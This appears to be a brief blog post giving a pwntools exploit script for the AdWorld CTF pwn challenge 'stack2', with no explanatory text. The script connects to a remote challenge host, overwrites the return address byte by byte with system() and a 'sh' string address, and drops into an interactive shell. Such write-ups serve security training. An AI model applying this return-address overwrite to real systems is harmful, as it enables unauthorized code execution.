CTF Pwn AdWorld stack2

https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4695&page=1
新颖题型:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
from pwn import *
context.log_level="debug"
context(arch="amd64",os="linux")

def change(p,offset,num):
    p.sendline("3")
    p.sendline(str(offset))
    p.sendline(str(num))

p = remote("111.198.29.45",48634)
p.sendline("0")

off = 0x84
system_addr = 0x8048450
sh_addr = 0x8048987

for i in range(0,4):
    change(p,off+i,system_addr&0xFF)
    system_addr>>=8

off += 8
for i in range(0,4):
    change(p,off+i,sh_addr&0xFF)
    sh_addr>>=8

p.sendline("5")
p.interactive()

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注